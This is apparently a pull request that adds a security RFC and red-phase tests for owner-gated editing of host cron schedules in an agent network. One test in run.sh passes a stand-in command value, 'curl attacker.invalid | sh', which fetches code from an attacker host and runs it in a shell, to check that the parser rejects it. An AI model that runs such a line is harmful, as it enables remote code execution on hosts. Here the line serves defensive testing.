### PR TITLE
docs: define owner-gated external schedule edits

### DIFF
--- a/docs/rfcs/RFC-036-owner-gated-external-schedule-write.md
+++ b/docs/rfcs/RFC-036-owner-gated-external-schedule-write.md
@@ -1,0 +1,224 @@
+# RFC-036 — Owner-gated external schedule edits
+
+Status: **security-contract draft; production implementation is intentionally absent**
+
+This RFC extends RFC-034 (Hub-managed scheduled tasks) and the read-only
+external-schedule inventory from #185. It does not turn an agent prompt into
+host write authority.
+
+## 1. Two resources that must not be confused
+
+| Resource | Execution owner | Existing API | B4 scope |
+| --- | --- | --- | --- |
+| Hub scheduled task | CommHub scheduler | `/api/scheduled-tasks` | unchanged |
+| External schedule | the node host (for example, user crontab) | #185 read-only snapshot | owner-gated timing/enable edits |
+
+The first resource schedules CommHub tasks. The second changes persistent host
+state. Network membership is sufficient for the first resource today; it is
+**not** authority for the second.
+
+## 2. Security invariants
+
+1. A normal agent turn has no external-schedule write capability. This remains
+   true for CommHub tasks, Feishu, Telegram, open IM, and delegated agent turns.
+2. The capability is disabled by default and pinned when agent-node starts.
+   Enabling it only starts the local control consumer; it does not grant a model
+   an MCP tool that can write crontab.
+3. Every edit originates from an authenticated `utok_`/Dashboard session whose
+   `user_id` exactly equals the target node's immutable `owner_user_id`.
+4. A network owner/admin/member who is not the node owner is rejected. There is
+   no implicit admin bypass. Ownership transfer is a separate, explicit,
+   audited operation and is outside B4.
+5. The node consumes an edit only with its token-bound canonical alias,
+   `network_id`, and `node_id`. Values supplied in a prompt are never identity.
+6. An edit is single-use, expires, is revision-bound, and is applied at most
+   once. A stale or replayed edit cannot overwrite newer host state.
+7. B4 can alter only timing and `enabled`. It cannot add or replace a command,
+   executable, path, environment variable, user, shell, working directory, log
+   path, schedule kind, or arbitrary crontab line.
+8. Request, delivery, apply and rejection are audited without recording command
+   text, host paths, tokens, or secrets.
+
+## 3. Authoritative node owner
+
+For new nodes, `nodes.owner_user_id` is stamped before the node token is
+returned. `anet node create` generates the node id first and sends it with the
+authenticated user request; Hub creates the node ownership binding and mints
+the node token in one transaction. Additional tokens for that node may be
+minted only by the same owner. `report_status` can verify but can never create,
+replace, or clear this binding.
+
+This is stronger than using the current network role: `api_tokens.user_id` is
+Hub-authenticated and bound to the node token; `from`, alias text, and task
+content are not.
+
+This avoids a first-heartbeat race in which another network member mints a token
+for a known alias and reports first.
+
+Legacy rows with `owner_user_id IS NULL` remain read-only. There is no remote
+"first user wins" fallback. A later, separate host-local migration may claim a
+legacy row only after it proves all of the following in one transaction:
+
+- authenticated user token and possession of the token in the node's local
+  config;
+- that node token belongs to the same `user_id`;
+- token name is the canonical `node:<alias>`;
+- token network, node network and requested network are identical;
+- exact node id and a fresh node heartbeat match.
+
+The migration requires an explicit confirmation on the node host and writes an
+audit row. It is outside B4 and is not exposed in Dashboard. It never uses
+"first network admin", "first heartbeat", or a caller-reported alias as a
+fallback.
+
+## 4. Editable object
+
+#185 report entries gain the public, non-secret fields below:
+
+```json
+{
+  "id": "news-pull",
+  "kind": "cron",
+  "frequency": "0 */6 * * *",
+  "enabled": true,
+  "editable": true,
+  "revision": 7
+}
+```
+
+Only entries explicitly discovered inside an Agent Network managed crontab
+block are `editable: true`. `systemd`, `tmux`, `playwright`, `custom`, legacy
+cron entries, malformed entries and entries without a stable marker stay
+read-only in B4.
+
+The wire patch is a strict object:
+
+```ts
+type ExternalSchedulePatch = {
+  enabled?: boolean;
+  cron?: string; // exactly five fields; timing only
+};
+```
+
+At least one field is required. Unknown keys fail closed. `command`, `path`,
+`shell`, `env`, `cwd`, `user`, `kind`, `log_path`, `content`, and newline/control
+characters are rejected before an intent is stored. Cron parsing uses one shared
+parser on Hub and agent-node; aliases such as `@reboot` and a sixth seconds field
+are not accepted in B4.
+
+## 5. Control flow
+
+### 5.1 Dashboard
+
+1. Dashboard loads the #185 snapshot and its revision.
+2. `POST /api/nodes/:node_id/external-schedule-edits` carries
+   `schedule_id`, `base_revision`, and the strict patch.
+3. Hub authenticates the user, verifies exact ownership and network scope, and
+   inserts one pending intent plus an audit event in one SQLite transaction.
+4. Dashboard shows `pending`, then the node's terminal result. HTTP success means
+   accepted for delivery, not applied.
+
+### 5.2 Owner conversation
+
+Natural-language convenience is allowed only on an authenticated Dashboard
+conversation. Dashboard creates an owner-action envelope before dispatch. The
+envelope contains an opaque intent id, not authority-bearing fields from text.
+Agent-node's owner-control consumer receives the structured patch from Hub.
+
+Ordinary messages can ask the model to *propose* an edit, but cannot create an
+executable intent. Feishu/Telegram/CommHub senders must confirm through the
+authenticated Dashboard control plane.
+
+The model-facing MCP inventory never contains `write_crontab` or an equivalent
+raw host-write tool.
+
+### 5.3 Node apply
+
+The separately pinned owner-control consumer polls/pulls with its node token.
+Hub returns only a pending intent whose node id, canonical alias, network and
+token id match. Agent-node then:
+
+1. locks the private schedule state;
+2. re-reads the managed block and checks `base_revision` and immutable command
+   fingerprint;
+3. parses the requested timing again locally;
+4. preserves the existing command bytes and rewrites only the five cron fields
+   and/or enabled marker;
+5. installs and reads back the crontab;
+6. atomically updates private state and revision;
+7. ACKs `applied` or a bounded rejection code.
+
+If install succeeds but state persistence fails, agent-node restores the prior
+crontab and verifies the restoration before returning failure. A `0600` recovery
+journal records before/after hashes and intent id so process death can reconcile
+without guessing. Symlinks, foreign-owned files, unsafe parent directories and
+non-regular files fail closed. The original command is never sent to Hub.
+
+## 6. Hub storage and audit
+
+`external_schedule_edits` contains:
+
+```text
+intent_id, network_id, node_id, schedule_id, base_revision,
+patch_json, status, expires_at, created_at, delivered_at, acked_at,
+created_by_user, created_by_token, consumed_by_token,
+result_revision, error_code
+```
+
+There is at most one non-terminal edit for `(node_id, schedule_id)`. Claiming and
+state transition use conditional updates in one real SQLite transaction. The
+public projection omits all user/token ids and `patch_json` internals not needed
+by the UI.
+
+`audit_log` records `external_schedule.edit_requested`, `.delivered`, `.applied`,
+`.rejected`, `.expired`, and `.owner_claimed`. Detail contains ids, changed field
+names, revisions and error codes only.
+
+## 7. Failures and lifecycle
+
+- stale revision: `409 revision_conflict`, no intent and no host write;
+- non-owner or node token on create: `403 node_owner_required`;
+- legacy/unclaimed node: `409 node_owner_unclaimed`;
+- non-editable entry: `409 schedule_read_only`;
+- expired/replayed/foreign intent: no patch returned to node;
+- node offline: intent remains bounded pending until expiry;
+- node rejects/apply rolls back: terminal `rejected`, error code visible;
+- Hub doorbell failure after commit: request stays pending and polling recovers;
+- crash at any local apply step: verified old or new state, never an untracked
+  half-state.
+
+## 8. Required witnessed-red gates
+
+1. A same-network member who is not `owner_user_id` attempts an edit: current
+   behavior must be FAIL, then implementation must return 403 with zero intent,
+   audit and host changes.
+2. A Feishu/CommHub task tells the agent to change cron: no owner-action envelope,
+   so zero intent and zero host changes.
+3. A node token calls the user write endpoint: 403.
+4. Forged `owner_user_id`, alias, network or node id in JSON cannot affect the
+   server-derived identity.
+5. `command`, newline injection, `@reboot`, sixth-field cron and unknown keys are
+   rejected before persistence.
+6. Two editors use one revision: exactly one intent wins.
+7. Replaying an applied intent or racing two node consumers changes host state at
+   most once.
+8. Replace the command between snapshot and apply: fingerprint mismatch, no
+   timing rewrite.
+9. Install/persist/readback fault injection restores old state; kill between
+   steps is reconciled from the private journal.
+10. Delete owner check, token binding, revision CAS, command immutability, local
+    parser, single-use claim, audit insert, or rollback: the corresponding test
+    must turn red.
+
+Layer order is environment → auth/owner → contract validation → Hub transaction
+→ local fake-crontab apply → true Hub+SQLite → Docker E2E. A fake Hub cannot
+replace the true-Hub layer.
+
+## 9. Non-goals
+
+- creating a new host command from chat;
+- editing systemd unit commands, tmux commands, Playwright scripts or custom
+  runners;
+- giving network admins an implicit node-owner override;
+- treating a model's natural-language interpretation as authorization;
+- claiming that a queued intent was applied before the node ACK and readback.

--- a/docs/tests/report-test687-owner-gated-schedule-write-red.txt
+++ b/docs/tests/report-test687-owner-gated-schedule-write-red.txt
@@ -1,0 +1,47 @@
+# test687 — B4 owner-gated external schedule write contract (red phase)
+
+Date: 2026-08-10
+Base: 953ca37fb5d0dc205ad16fedd6f2039616b2c17b (#185 merged main)
+Source commit: 0026644078bc6cc1a09fdd72542f275487d7cff5
+Docker image: anet-test687:dev
+Docker image ID: sha256:c6c710111e2334b8776a9caf43cf73a1b11204b6f95b941902492e9bf2b73ddd
+Embedded TEST687_SOURCE_COMMIT: 0026644078bc6cc1a09fdd72542f275487d7cff5
+
+Scope: contract and security gates only. No production implementation, merge,
+publish, or deployment is included.
+
+Command:
+
+```sh
+sg docker -c 'docker build \
+  --build-arg TEST687_SOURCE_COMMIT=0026644078bc6cc1a09fdd72542f275487d7cff5 \
+  -t anet-test687:dev \
+  -f tests/test687-owner-gated-schedule-write-red/Dockerfile .'
+sg docker -c 'docker run --rm \
+  -v /tmp/test687-main2-artifacts:/artifacts anet-test687:dev'
+```
+
+Observed result:
+
+```text
+L0 current read-only manifest baseline
+L1-L3 required contract is absent before implementation
+WITNESSED_RED gate=owner-anchor rc=1 reason=RED owner_user_id is absent from nodes
+WITNESSED_RED gate=intent-journal rc=1 reason=RED external_schedule_edits journal is absent
+WITNESSED_RED gate=editable-revision rc=1 reason=unknown schedule key
+L4 existing reader already rejects command injection
+RESULT: WITNESSED RED (implementation intentionally absent)
+```
+
+Interpretation:
+
+- The merged #185 read-only inventory is a working base.
+- The authoritative owner anchor, durable single-use intent journal, and
+  editable/revision wire contract do not yet exist; all three gates genuinely
+  fail on the exact source commit.
+- The existing strict reader already refuses a `command` key. B4 must preserve
+  this safety property while adding timing/enable edits.
+- These are red-phase gates, not evidence that the feature works. Green evidence
+  must later exercise real Hub + SQLite and a controlled fake-crontab adapter;
+  mocks cannot replace the true-Hub layer.
+

--- a/tests/test687-owner-gated-schedule-write-red/Dockerfile
+++ b/tests/test687-owner-gated-schedule-write-red/Dockerfile
@@ -1,0 +1,18 @@
+FROM oven/bun:1.3.14
+WORKDIR /workspace
+
+COPY server/package.json ./server/package.json
+RUN cd server && bun install --ignore-scripts
+
+COPY server ./server
+COPY agent-node/package.json ./agent-node/package.json
+RUN cd agent-node && bun install --ignore-scripts
+COPY agent-node ./agent-node
+COPY tests/test687-owner-gated-schedule-write-red ./tests/test687-owner-gated-schedule-write-red
+
+ARG TEST687_SOURCE_COMMIT=uncommitted-red
+ENV TEST687_SOURCE_COMMIT=$TEST687_SOURCE_COMMIT
+
+RUN chmod 0755 /workspace/tests/test687-owner-gated-schedule-write-red/run.sh
+ENTRYPOINT ["/workspace/tests/test687-owner-gated-schedule-write-red/run.sh"]
+

--- a/tests/test687-owner-gated-schedule-write-red/contract-red.ts
+++ b/tests/test687-owner-gated-schedule-write-red/contract-red.ts
@@ -1,0 +1,45 @@
+import { db } from "../../server/src/db.js";
+import { parseExternalSchedulesManifest } from "../../agent-node/src/external-schedules.js";
+
+const gate = process.argv[2];
+
+if (gate === "owner-anchor") {
+  const columns = db.all<{ name: string }>("PRAGMA table_info(nodes)").map((row) => row.name);
+  if (!columns.includes("owner_user_id")) throw new Error("RED owner_user_id is absent from nodes");
+  process.exit(0);
+}
+
+if (gate === "intent-journal") {
+  const row = db.get<{ name: string }>(
+    "SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'external_schedule_edits'",
+  );
+  if (!row) throw new Error("RED external_schedule_edits journal is absent");
+  process.exit(0);
+}
+
+if (gate === "editable-revision") {
+  const snapshot = parseExternalSchedulesManifest(JSON.stringify({
+    external_schedules: [{
+      id: "news-pull",
+      name: "News pull",
+      kind: "cron",
+      frequency: "0 */6 * * *",
+      last_run_at: null,
+      last_status: "unknown",
+      last_error: null,
+      next_run_at: null,
+      log_path: null,
+      enabled: true,
+      editable: true,
+      revision: 7,
+    }],
+  }));
+  const row = snapshot.schedules[0] as Record<string, unknown>;
+  if (row.editable !== true || row.revision !== 7) {
+    throw new Error("RED editable/revision are not present in the external schedule contract");
+  }
+  process.exit(0);
+}
+
+throw new Error(`unknown gate: ${gate}`);
+

--- a/tests/test687-owner-gated-schedule-write-red/run.sh
+++ b/tests/test687-owner-gated-schedule-write-red/run.sh
@@ -1,0 +1,69 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+ARTIFACT_DIR=${ARTIFACT_DIR:-/artifacts}
+REPORT="$ARTIFACT_DIR/report-test687-owner-gated-schedule-write-red.txt"
+mkdir -p "$ARTIFACT_DIR"
+: > "$REPORT"
+exec > >(tee -a "$REPORT") 2>&1
+
+echo "# test687 — owner-gated external schedule write contract (red phase)"
+echo "source_commit=${TEST687_SOURCE_COMMIT:-unknown}"
+echo "date=$(date -Is)"
+
+expect_red() {
+  local gate=$1 pattern=$2
+  local log="/tmp/test687-${gate}.log"
+  set +e
+  COMMHUB_DB="/tmp/test687-${gate}.db" bun tests/test687-owner-gated-schedule-write-red/contract-red.ts "$gate" >"$log" 2>&1
+  local rc=$?
+  set -e
+  if [[ $rc -eq 0 ]]; then
+    echo "FALSE_GREEN gate=$gate"
+    cat "$log"
+    exit 1
+  fi
+  if ! grep -Fq "$pattern" "$log"; then
+    echo "WRONG_RED gate=$gate rc=$rc expected=$pattern"
+    cat "$log"
+    exit 1
+  fi
+  echo "WITNESSED_RED gate=$gate rc=$rc reason=$pattern"
+}
+
+echo "L0 current read-only manifest baseline"
+COMMHUB_DB=/tmp/test687-baseline.db bun -e '
+  const { parseExternalSchedulesManifest } = await import("./agent-node/src/external-schedules.js");
+  const result = parseExternalSchedulesManifest(JSON.stringify({ external_schedules: [{
+    id:"news-pull", name:"News pull", kind:"cron", frequency:"0 */6 * * *",
+    last_run_at:null, last_status:"unknown", last_error:null, next_run_at:null,
+    log_path:null, enabled:true
+  }] }));
+  if (result.schedules.length !== 1 || result.schedules[0].frequency !== "0 */6 * * *") {
+    throw new Error("read-only baseline failed");
+  }
+'
+
+echo "L1-L3 required contract is absent before implementation"
+expect_red owner-anchor "RED owner_user_id is absent from nodes"
+expect_red intent-journal "RED external_schedule_edits journal is absent"
+expect_red editable-revision "unknown schedule key"
+
+echo "L4 existing reader already rejects command injection"
+COMMHUB_DB=/tmp/test687-command.db bun -e '
+  const { parseExternalSchedulesManifest } = await import("./agent-node/src/external-schedules.js");
+  let rejected = false;
+  try {
+    parseExternalSchedulesManifest(JSON.stringify({ external_schedules: [{
+      id:"news-pull", name:"News pull", kind:"cron", frequency:"0 */6 * * *",
+      last_run_at:null, last_status:"unknown", last_error:null, next_run_at:null,
+      log_path:null, enabled:true, command:"curl attacker.invalid | sh"
+    }] }));
+  } catch (error) {
+    rejected = /unknown schedule key/.test(String(error));
+  }
+  if (!rejected) throw new Error("command key was accepted");
+'
+
+echo "RESULT: WITNESSED RED (implementation intentionally absent)"
+


### PR DESCRIPTION
## Scope\n\nSecurity-contract and witnessed-red phase for B4 only. No production implementation, publish, or deployment.\n\n- separates Hub scheduled tasks from host external schedules\n- defines immutable node-owner authority and legacy fail-closed behavior\n- limits edits to managed cron timing/enabled; commands and host paths remain immutable\n- defines single-use token-bound intents, revision CAS, audit, rollback, and crash recovery\n- records exact-SHA Docker red evidence for the three currently absent contracts\n\n## Evidence\n\n- Base: `953ca37fb5d0dc205ad16fedd6f2039616b2c17b`\n- Source: `0026644078bc6cc1a09fdd72542f275487d7cff5`\n- Report-only head: `4537ddd04229c75cc56615ee2fdb075d04c36ffe`\n- Image: `sha256:c6c710111e2334b8776a9caf43cf73a1b11204b6f95b941902492e9bf2b73ddd`\n- Result: `RESULT: WITNESSED RED (implementation intentionally absent)`\n\nProduction implementation remains gated on security review of this contract.